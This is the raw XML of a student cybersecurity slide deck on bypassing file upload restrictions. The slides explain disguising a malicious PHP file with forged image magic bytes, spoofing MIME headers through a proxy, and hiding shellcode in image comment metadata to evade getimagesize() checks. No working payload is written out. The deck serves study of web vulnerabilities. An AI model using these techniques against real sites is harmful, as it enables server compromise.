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66" r:id="rId5"/>
    <p:sldId id="274" r:id="rId6"/>
    <p:sldId id="278" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="279" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="261" r:id="rId15"/>
    <p:sldId id="262" r:id="rId16"/>
    <p:sldId id="281" r:id="rId17"/>
    <p:sldId id="259" r:id="rId18"/>
    <p:sldId id="260" r:id="rId19"/>
    <p:sldId id="289" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="264" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="265" r:id="rId26"/>
    <p:sldId id="284"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00" autoAdjust="0"/>
    <p:restoredTop sz="92376" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85"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CDB28-38E4-4D1B-A313-41DF2A11AC1E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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6333F-55DA-4ECA-917F-B6103BC61260}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15721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6333F-55DA-4ECA-917F-B6103BC61260}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37695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https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D16333F-55DA-4ECA-917F-B6103BC61260}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3344614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https://rcenetsec.com/hide-malicious-shell-in-image-file/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://gobiasinfosec.blog/2019/12/24/file-upload-attacks-php-reverse-shell/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://dev.to/krashwin/ctf-learn-1-231i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D16333F-55DA-4ECA-917F-B6103BC61260}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192467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https://donjajo.com/spoof-http-headers-using-squid-proxy-server/#.YmmKFWhKg2w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D16333F-55DA-4ECA-917F-B6103BC61260}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155526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DDF82F-4BC6-4D8D-8584-0E744D5CB1F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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44B1F57-4637-4AC3-8639-D0D62D6941E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863393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07B5E-77FC-46E3-9685-BAE6DEED573B}" type="datetime1">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226548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50F2C-9B3A-4E98-A9C8-C1BE118E9D11}" type="datetime1">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18406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D7819-C16D-461C-B2A4-4E2E497E5ADB}" type="datetime1">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2675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BABFD65-4EA4-413E-9710-1E4590B83318}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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44B1F57-4637-4AC3-8639-D0D62D6941E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072215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8B903-E3D7-4265-90B8-BA05ACCE3250}" type="datetime1">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204907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719CB-3430-45CC-A149-F16A678E8063}" type="datetime1">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327322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6FD74-3839-4E2A-94E8-B14F718C3A63}" type="datetime1">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353417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8187C-F36D-453D-956D-F26B0BF93F35}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339780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A5C50FB-CC3F-4921-AF38-0733C95DBB1F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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4B1F57-4637-4AC3-8639-D0D62D6941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23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6AD88D-C951-4076-8673-0C6B96DE925E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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4B1F57-4637-4AC3-8639-D0D62D6941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988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80948F5-9440-47C7-B3FF-63796BE59295}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/10/22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4B1F57-4637-4AC3-8639-D0D62D6941E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9297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file_signatur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xiftool.org/instal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2174218"/>
            <a:ext cx="8361229" cy="2098226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing File Upload Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679906" y="4442061"/>
            <a:ext cx="6831673" cy="1086237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS Cybersecurity Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Megan Ripley</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400031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Exploiting mime-type (contd.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1685836"/>
            <a:ext cx="9601200" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hexedit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the web administrator has set the types of files that can be uploaded, a stronger filter is to check the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Magic Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ at the beginning of a file to determine if it is really a valid file to be uploaded. So it is not enough to rename the file to ensure that it can be uploaded and executed on the victim machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hexedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool you can check and modify the beginning bytes of malicious php file and set them as those relating to the format that is accepted by the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="4352836"/>
            <a:ext cx="2286000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>BMP : 42 4D</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>JPG :   FF D8 FF E0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>PNG :  89 50 4E 47</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>GIF :   47 49 46 38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA87BA5-4600-EA44-8E61-FD1E3EBE3D20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966158" y="6147861"/>
            <a:ext cx="9304724" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Sources: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rcenetsec.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/hide-malicious-shell-in-image-file/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>gobiasinfosec.blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/2019/12/24/file-upload-attacks-php-reverse-shell/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dev.to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>krashwin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/ctf-learn-1-231i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73124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229193" cy="1685925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Hexedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t> example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714257" y="3227185"/>
            <a:ext cx="6763483" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>To add new bytes, press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ctrl+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> for each byte you need to add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030084" y="1395506"/>
            <a:ext cx="2131830" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Original php file:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="759515" y="3681305"/>
            <a:ext cx="10994265" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875350" y="5020013"/>
            <a:ext cx="10762593" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Now insert the ‘Magic Number’ for the file type you’re aiming for. In this example, we’ll make it .jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692899" y="1851098"/>
            <a:ext cx="9127502" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1725752" y="5570111"/>
            <a:ext cx="9061787" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310379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Exploiting mime-type (contd.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another option to bypass mime-type is to intercept and modify the http headers before the file is sent to the server to upload.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be accomplished using a proxy server.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker sends the http packet to the proxy which modifies the headers and then sends the modified packet to the server.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This was not tested as part of this project.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC5F72A-B78B-4641-B9ED-AA9CC49E5852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122972" y="6453386"/>
            <a:ext cx="7625751" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Source: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>donjajo.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/spoof-http-headers-using-squid-proxy-server/#.YmmKFWhKg2w</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336763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Exploit php getimagesize()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For file uploads which validate image size using php getimagesize(), it may be possible to execute shellcode by inserting it into the Comment attribute of Image properties and saving it as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file.jpg.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. You can do this with gimp or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exiftools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
